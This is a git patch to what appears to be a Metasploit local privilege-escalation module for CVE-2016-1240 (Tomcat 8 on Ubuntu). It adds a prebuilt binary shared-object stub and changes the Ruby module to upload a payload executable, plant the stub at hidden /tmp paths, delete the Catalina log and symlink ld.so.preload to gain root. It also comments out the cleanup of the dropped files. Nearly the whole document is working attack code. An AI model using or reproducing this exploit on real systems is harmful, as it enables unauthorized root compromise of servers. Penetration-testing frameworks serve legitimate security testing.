From 34b1e66f9045c5cdf8d86278a0f32a67d19a14eb Mon Sep 17 00:00:00 2001
From: h00die <michaeltcyr@gmail.com>
Date: Wed, 18 Jan 2023 20:00:03 -0500
Subject: [PATCH] tomcat 8 priv esc on ubuntu prebuilt so file

---
 data/exploits/CVE-2016-1240/stub.so           | Bin 0 -> 8320 bytes
 .../local/tomcat_ubuntu_log_init_priv_esc.rb  |  26 ++++++++++++------
 2 files changed, 18 insertions(+), 8 deletions(-)
 create mode 100644 data/exploits/CVE-2016-1240/stub.so

diff --git a/data/exploits/CVE-2016-1240/stub.so b/data/exploits/CVE-2016-1240/stub.so
new file mode 100644
index 0000000000000000000000000000000000000000..48bacc039a4ff66311077b252b10d61864f0023b
GIT binary patch
literal 8320
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
Sy`MqjM`^RecAw^4AOF84P#oX@

literal 0
HcmV?d00001

diff --git a/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb b/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb
index 71e7374713..5770d5d40d 100644
--- a/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb
+++ b/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb
@@ -133,18 +133,28 @@ class MetasploitModule < Msf::Exploit::Local
     )
     print_good("Original #{catalina} backed up to #{path}")
 
+    if live_compile?
+      # upload our privesc stub
+      so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
+      so_stub_path = "#{base_dir}/#{so_stub}"
+      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+      # Upload exploit stub
+      vprint_status "Compiling exploit stub: #{so_stub_path}"
+      upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
+    else
+      payload_path = '/tmp/.jMeY5vToQl'
+      so_stub = '.ny9NyKEPJ.so'
+      so_stub_path = "/tmp/#{so_stub}"
+
+      write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so'))
+    end
     # Upload payload executable
-    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
     vprint_status("Uploading Payload to #{payload_path}")
     upload_and_chmodx payload_path, generate_payload_exe
-    register_file_for_cleanup(payload_path)
+    # register_file_for_cleanup(payload_path)
 
-    # upload our privesc stub
-    so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
-    so_stub_path = "#{base_dir}/#{so_stub}"
-    vprint_status "Compiling exploit stub: #{so_stub_path}"
-    upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
-    register_file_for_cleanup(so_stub_path)
+    # register_file_for_cleanup(so_stub_path)
 
     # delete the log and symlink ld.so.preload
     vprint_status("Deleting #{catalina}")